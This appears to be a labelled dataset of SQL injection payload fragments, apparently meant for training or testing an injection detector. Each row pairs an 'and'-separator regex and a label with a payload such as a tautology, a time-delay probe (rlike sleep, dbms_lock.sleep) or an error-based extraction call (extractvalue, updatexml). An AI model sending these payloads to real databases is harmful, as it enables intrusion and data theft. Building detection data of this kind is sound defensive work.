(\%20and|\+and|&&|\&\&)										1		 1"   )    )    procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1 where 7802  =  7802
(\%20and|\+and|&&|\&\&)										1		 1 where 6369  =  6369 procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 1  )   as vxsh where 4706  =  4706
(\%20and|\+and|&&|\&\&)										1		 1  )   as nxmd where 8650  =  8650
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as rhwg where 8843  =  8843
(\%20and|\+and|&&|\&\&)										1		 elt  (  5098  =  2728
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as bosq where 4695  =  4695
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1 where 4949  =  4949
(\%20and|\+and|&&|\&\&)										1		 iif  (  7011  =  2522
(\%20and|\+and|&&|\&\&)										1		 1" where 7015  =  7015 procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 iif  (  1378  =  6569
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 5739-5738
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as nejd where 2885  =  2885
(\%20and|\+and|&&|\&\&)										1		 1" where 7022  =  7022
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as jrld where 3488  =  3488
(\%20and|\+and|&&|\&\&)										1		 1  )   as jdhz where 2021  =  2021
(\%20and|\+and|&&|\&\&)										1		 iif  (  5571  =  4947
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 2278  =  2278
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as rsnb where 3168  =  3168 procedure analyse  (  extractvalue  (  9627
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as wajy where 8593  =  8593
(\%20and|\+and|&&|\&\&)										1		 1"  )   as semi where 4260  =  4260
(\%20and|\+and|&&|\&\&)										1		 1  )   where 8041  =  8041
(\%20and|\+and|&&|\&\&)										1		 1  )   as sglv where 7676  =  7676
(\%20and|\+and|&&|\&\&)										1		 iif  (  8770  =  9611
(\%20and|\+and|&&|\&\&)										1		 1  )   as jtfx where 8038  =  8038
(\%20and|\+and|&&|\&\&)										1		  ) 
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1  )   where 3936  =  3936
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1 where 4519  =  4519
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 2496  =  2496
(\%20and|\+and|&&|\&\&)										1		 1"  )   as awdg where 9512  =  9512
(\%20and|\+and|&&|\&\&)										1		 1" where 1982  =  1982
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as epfz where 5471  =  5471
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 9621  =  9621
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1" where 1100  =  1100
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1"  )   as ktnq where 9005  =  9005
(\%20and|\+and|&&|\&\&)										1		 1 where 7442  =  7442
(\%20and|\+and|&&|\&\&)										1		 end
(\%20and|\+and|&&|\&\&)										1		 1  )   procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1  )   where 9344  =  9344
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 4951  =  4951
(\%20and|\+and|&&|\&\&)										1		 1  )   as iqkf where 7780  =  7780
(\%20and|\+and|&&|\&\&)										1		 1" where 7599  =  7599
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1  )   as pyjx where 9005  =  9005
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1 where 1576  =  1576
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as vbdo where 3882  =  3882
(\%20and|\+and|&&|\&\&)										1		 1  )   procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 1"  )   procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 iif  (  2205  =  4764
(\%20and|\+and|&&|\&\&)										1		 1" where 7158  =  7158
(\%20and|\+and|&&|\&\&)										1		 1 where 3735  =  3735
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1"  )   as cysq where 5258  =  5258
(\%20and|\+and|&&|\&\&)										1		 1  )   as fhvr where 5544  =  5544
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as ogcv where 4396  =  4396
(\%20and|\+and|&&|\&\&)										1		 1"  )   as vqkz where 8536  =  8536
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 2445  =  2445
(\%20and|\+and|&&|\&\&)										1		 1 where 4940  =  4940
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 iif  (  9007  =  3836
(\%20and|\+and|&&|\&\&)										1		 1 where 4245  =  4245
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as xlww where 5844  =  5844
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1  )   where 2170  =  2170
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 4112  =  4112
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1" where 9756  =  9756
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 7514  =  7514
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1  )   as zhvx where 3171  =  3171 procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 1  )   where 6090  =  6090
(\%20and|\+and|&&|\&\&)										1		 iif  (  2976  =  2976
(\%20and|\+and|&&|\&\&)										1		 1"  )   as nfpe where 2679  =  2679
(\%20and|\+and|&&|\&\&)										1		 1"  )   as hsws where 6656  =  6656
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1 where 6434  =  6434
(\%20and|\+and|&&|\&\&)										1		 1%"   )    )     )   procedure analyse  (  extractvalue  (  9627
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as qode where 2398  =  2398 procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1"  )   as nyzd where 5305  =  5305
(\%20and|\+and|&&|\&\&)										1		 1%"   )    )     )   procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 1  )   where 9160  =  9160
(\%20and|\+and|&&|\&\&)										1		 1  )   as cjmt where 4839  =  4839 procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as jvvs where 9594  =  9594
(\%20and|\+and|&&|\&\&)										1		 1  )   as wshv where 5684  =  5684
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 make_set  (  6174  =  9734
(\%20and|\+and|&&|\&\&)										1		 1" where 7110  =  7110
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as syot where 1199  =  1199
(\%20and|\+and|&&|\&\&)										1		 iif  (  1095  =  2853
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 8657  =  8657
(\%20and|\+and|&&|\&\&)										1		 1 where 1519  =  1519
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 5005  =  5005 procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 1  )   as nmlm where 9872  =  9872
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as mcyh where 1001  =  1001
(\%20and|\+and|&&|\&\&)										1		 1  )   as qort where 1554  =  1554
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 begin user_lock.sleep  (  5  ) 
(\%20and|\+and|&&|\&\&)										1		 1  )   where 9167  =  9167
(\%20and|\+and|&&|\&\&)										1		 1"  )   as dien where 4022  =  4022
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1"  )   as rbgl where 3822  =  3822 procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 1%"   )    )     )  
(\%20and|\+and|&&|\&\&)										1		 1  )   where 1079  =  1079
(\%20and|\+and|&&|\&\&)										1		 1  )   as qwsa where 2874  =  2874
(\%20and|\+and|&&|\&\&)										1		 1  )   as ryks where 1196  =  1196
(\%20and|\+and|&&|\&\&)										1		 1  )   where 5025  =  5025
(\%20and|\+and|&&|\&\&)										1		 1" where 7015  =  7015
(\%20and|\+and|&&|\&\&)										1		 1 where 5443  =  5443
(\%20and|\+and|&&|\&\&)										1		 1" procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 1" where 7828  =  7828
(\%20and|\+and|&&|\&\&)										1		 1  )   as iknl where 3885  =  3885 rlike sleep  (  5  )  #
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 5491  =  5491
(\%20and|\+and|&&|\&\&)										1		 1%"  )   procedure analyse  (  extractvalue  (  9627
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as jucs where 6836  =  6836
(\%20and|\+and|&&|\&\&)										1		 1  )   where 2083  =  2083
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as eigk where 2557  =  2557
(\%20and|\+and|&&|\&\&)										1		 1 procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 1"  )   as ronb where 9368  =  9368
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as oqyo where 7995  =  7995
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as pmff where 6649  =  6649
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as xcyo where 2929  =  2929
(\%20and|\+and|&&|\&\&)										1		 1  )   where 2940  =  2940
(\%20and|\+and|&&|\&\&)										1		 1"  )   as yggn where 1006  =  1006 procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 1"  )   as kzuq where 4259  =  4259
(\%20and|\+and|&&|\&\&)										1		 1" where 3434  =  3434
(\%20and|\+and|&&|\&\&)										1		  (  8362  =  9139  )  *9139
(\%20and|\+and|&&|\&\&)										1		 end# thjv
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1  )   as ywrn where 1893  =  1893
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as pqbs where 4409  =  4409
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 8390  =  8390
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 9115  =  9115
(\%20and|\+and|&&|\&\&)										1		 1 where 2956  =  2956
(\%20and|\+and|&&|\&\&)										1		 1  )   as imdt where 6431  =  6431
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1 rlike sleep  (  5  )  # urxh
(\%20and|\+and|&&|\&\&)										1		 1"  )   as ypfa where 6128  =  6128
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  2385  )  
(\%20and|\+and|&&|\&\&)										1		 1  )   as selm where 5759  =  5759
(\%20and|\+and|&&|\&\&)										1		 1" where 6179  =  6179
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as zbfj where 2285  =  2285
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1"  )   procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 elt  (  8192  =  8192
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as luon where 4676  =  4676 rlike sleep  (  5  )  #
(\%20and|\+and|&&|\&\&)										1		 1" where 3740  =  3740 rlike sleep  (  5  )  #
(\%20and|\+and|&&|\&\&)										1		 1"  )   as dlfq where 8410  =  8410
(\%20and|\+and|&&|\&\&)										1		 1  )   where 6472  =  6472
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as dqfl where 7527  =  7527
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 9248  =  9248
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 9855  =  9855
(\%20and|\+and|&&|\&\&)										1		 1"  )   as dgzf where 4834  =  4834
(\%20and|\+and|&&|\&\&)										1		 1  )   as uuro where 6784  =  6784
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1  )   where 6424  =  6424
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1"  )   as jqli where 7793  =  7793
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as jebl where 3464  =  3464
(\%20and|\+and|&&|\&\&)										1		 1"  )   as bksv where 5375  =  5375
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1  )   where 9078  =  9078 rlike sleep  (  5  )  #
(\%20and|\+and|&&|\&\&)										1		 1   )    )     ) 
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 1392  =  1392 procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 iif  (  4460  =  1610
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as xtlt where 9293  =  9293
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 2152  =  2152
(\%20and|\+and|&&|\&\&)										1		 1"  )   as bpmk where 4506  =  4506
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as qqhm where 7182  =  7182
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 5358  =  5358
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as ylah where 9248  =  9248
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1  )   where 3030  =  3030
(\%20and|\+and|&&|\&\&)										1		 1"  )   as pwvu where 8267  =  8267
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 7228  =  7228
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as zykv where 2158  =  2158
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as fqee where 3286  =  3286
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 7452  =  7452
(\%20and|\+and|&&|\&\&)										1		 elt  (  2427  =  2427
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 6964  =  6964
(\%20and|\+and|&&|\&\&)										1		 1"  )   procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 iif  (  6307  =  2459
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 1 where 3956  =  3956
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1  )   as afxc where 7497  =  7497
(\%20and|\+and|&&|\&\&)										1		 1 where 7038  =  7038
(\%20and|\+and|&&|\&\&)										1		 1"  )   as wehx where 5744  =  5744
(\%20and|\+and|&&|\&\&)										1		 1  )   rlike sleep  (  5  ) 
(\%20and|\+and|&&|\&\&)										1		 1" where 1386  =  1386
(\%20and|\+and|&&|\&\&)										1		 1" where 5477  =  5477
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1 where 5700  =  5700
(\%20and|\+and|&&|\&\&)										1		 iif  (  3548  =  8646
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 6679  =  6679 rlike sleep  (  5  )  #
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as nhus where 3689  =  3689
(\%20and|\+and|&&|\&\&)										1		 1 where 3744  =  3744
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1"  )   as eaxo where 2728  =  2728
(\%20and|\+and|&&|\&\&)										1		 iif  (  8213  =  4718
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 iif  (  1746  =  1730
(\%20and|\+and|&&|\&\&)										1		 1" where 5062  =  5062
(\%20and|\+and|&&|\&\&)										1		 1"  )   rlike sleep  (  5  )  #
(\%20and|\+and|&&|\&\&)										1		 1%" rlike sleep  (  5  )  #
(\%20and|\+and|&&|\&\&)										1		 1  )   as zodp where 9112  =  9112
(\%20and|\+and|&&|\&\&)										1		 1 where 6304  =  6304
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as ndrh where 6308  =  6308
(\%20and|\+and|&&|\&\&)										1		 1" procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 1 where 7254  =  7254
(\%20and|\+and|&&|\&\&)										1		 1%"   )    )     )   procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 1%"   )    )     )   rlike sleep  (  5  )  #
(\%20and|\+and|&&|\&\&)										1		 1 where 2301  =  2301
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1  )   where 8813  =  8813
(\%20and|\+and|&&|\&\&)										1		  (  8266  =  8266  )  *9900
(\%20and|\+and|&&|\&\&)										1		 1" where 4445  =  4445 procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 1 where 4372  =  4372
(\%20and|\+and|&&|\&\&)										1		 1"  )   as vzdq where 3160  =  3160
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as xzcl where 2332  =  2332
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as vcvn where 2106  =  2106
(\%20and|\+and|&&|\&\&)										1		 1"  )   as ivuv where 5691  =  5691
(\%20and|\+and|&&|\&\&)										1		 iif  (  2840  =  3788
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as xwrq where 4161  =  4161
(\%20and|\+and|&&|\&\&)										1		 1  )   as phja where 4627  =  4627
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 iif  (  1149  =  4765
(\%20and|\+and|&&|\&\&)										1		 1 where 6500  =  6500
(\%20and|\+and|&&|\&\&)										1		 iif  (  6369  =  5881
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 8098  =  8098
(\%20and|\+and|&&|\&\&)										1		 1  )   where 4780  =  4780
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 iif  (  5257  =  5257
(\%20and|\+and|&&|\&\&)										1		 1"  )   as ebvt where 5305  =  5305
(\%20and|\+and|&&|\&\&)										1		 1 where 9752  =  9752
(\%20and|\+and|&&|\&\&)										1		  (  case when 8422  =  8452 then 1 else null end  ) 
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 1410  =  1410
(\%20and|\+and|&&|\&\&)										1		 1 where 6365  =  6365
(\%20and|\+and|&&|\&\&)										1		 1 where 7882  =  7882
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 1807  =  1807
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1%"  )   procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 1" where 8387  =  8387
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as bsvo where 3605  =  3605
(\%20and|\+and|&&|\&\&)										1		 1  )   procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		   (  updatexml  (  8862
(\%20and|\+and|&&|\&\&)										1		 iif  (  9342  =  6508
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 7753  =  7753
(\%20and|\+and|&&|\&\&)										1		 elt  (  2567  =  9921
(\%20and|\+and|&&|\&\&)										1		 1  )   where 4992  =  4992
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as eveb where 7567  =  7567
(\%20and|\+and|&&|\&\&)										1		 1"  )   as piwi where 2918  =  2918
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1  )   where 5651  =  5651
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as ctqr where 2609  =  2609
(\%20and|\+and|&&|\&\&)										1		 1  )   where 4866  =  4866
(\%20and|\+and|&&|\&\&)										1		 1%" procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 else dbms_lock.sleep  (  0  ) 
(\%20and|\+and|&&|\&\&)										1		 1" where 6352  =  6352
(\%20and|\+and|&&|\&\&)										1		 1"  )   as axua where 6718  =  6718
(\%20and|\+and|&&|\&\&)										1		 1  )   where 1193  =  1193 procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as qgwq where 6122  =  6122
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1" where 8234  =  8234
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1  )   where 9307  =  9307
(\%20and|\+and|&&|\&\&)										1		 1" where 8732  =  8732
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as rroe where 4840  =  4840
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1" where 8571  =  8571
(\%20and|\+and|&&|\&\&)										1		 end#
(\%20and|\+and|&&|\&\&)										1		 iif  (  9229  =  4158
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1"  )   as xrsi where 9498  =  9498
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as xcsm where 9231  =  9231
(\%20and|\+and|&&|\&\&)										1		 1"  )   as vdim where 1296  =  1296
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1" where 7879  =  7879
(\%20and|\+and|&&|\&\&)										1		 1  )   as xtgr where 1545  =  1545
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as ikuz where 7385  =  7385
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    rlike sleep  (  5  )  #
(\%20and|\+and|&&|\&\&)										1		 1  )   as nioj where 9703  =  9703
(\%20and|\+and|&&|\&\&)										1		 1"  )   as ltbl where 6395  =  6395
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1"  )   as ranl where 5553  =  5553
(\%20and|\+and|&&|\&\&)										1		 1 procedure analyse  (  extractvalue  (  9255
(\%20and|\+and|&&|\&\&)										1		 1" where 6004  =  6004
(\%20and|\+and|&&|\&\&)										1		 1  )   as duqb where 6495  =  6495
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as prxq where 4600  =  4600
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as jsdc where 2748  =  2748
(\%20and|\+and|&&|\&\&)										1		 1  )   where 9708  =  9708
(\%20and|\+and|&&|\&\&)										1		 1 where 4091  =  4091
(\%20and|\+and|&&|\&\&)										1		 1   )    )    rlike sleep  (  5  )  #
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as bvij where 7913  =  7913
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1"  )   as ufai where 9673  =  9673
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as pxmz where 2596  =  2596
(\%20and|\+and|&&|\&\&)										1		 1  )   where 1487  =  1487
(\%20and|\+and|&&|\&\&)										1		 1  )   as ktfu where 2637  =  2637
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as upvg where 4826  =  4826
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as klmm where 3107  =  3107
(\%20and|\+and|&&|\&\&)										1		 1   )    )    procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 1 where 8966  =  8966
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1"  )   as uorp where 7208  =  7208
(\%20and|\+and|&&|\&\&)										1		   (  extractvalue  (  1759
(\%20and|\+and|&&|\&\&)										1		 1" where 3318  =  3318
(\%20and|\+and|&&|\&\&)										1		 1  )   as iiku where 9466  =  9466
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 6903  =  6903
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  right  (  char  (  3702  )  
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as vmwj where 5597  =  5597
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 iif  (  1718  =  5436
(\%20and|\+and|&&|\&\&)										1		 1"  )   as ikdo where 4128  =  4128
(\%20and|\+and|&&|\&\&)										1		 1  )   where 6150  =  6150
(\%20and|\+and|&&|\&\&)										1		 1" where 9461  =  9461
(\%20and|\+and|&&|\&\&)										1		 1 where 6173  =  6173
(\%20and|\+and|&&|\&\&)										1		 1"  )   as eomu where 6599  =  6599
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as smtf where 5829  =  5829
(\%20and|\+and|&&|\&\&)										1		 1" where 9669  =  9669
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as gocb where 4335  =  4335
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as wfne where 8933  =  8933
(\%20and|\+and|&&|\&\&)										1		 1"  )   as nyui where 2511  =  2511
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as nwyh where 7100  =  7100
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 1705  =  1705
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as dvpb where 6673  =  6673
(\%20and|\+and|&&|\&\&)										1		 1" where 5977  =  5977
(\%20and|\+and|&&|\&\&)										1		 1"   )    )    as uqem where 3521  =  3521
(\%20and|\+and|&&|\&\&)										1		 call regexp_substring  (  repeat  (  left  (  crypt_key  (  char  (  65  )  ||char  (  69  )  ||char  (  83  )  
(\%20and|\+and|&&|\&\&)										1		 1
(\%20and|\+and|&&|\&\&)										1		 1"  )   where 8588  =  8588
(\%20and|\+and|&&|\&\&)										1		 1  )   where 6304  =  6304
(\%20and|\+and|&&|\&\&)										1		 1   )    )    as rbcf where 1053  =  1053
(\%20and|\+and|&&|\&\&)										1		 1" procedure analyse  (  extractvalue  (  5840
(\%20and|\+and|&&|\&\&)										1		 iif  (  9875  =  8961
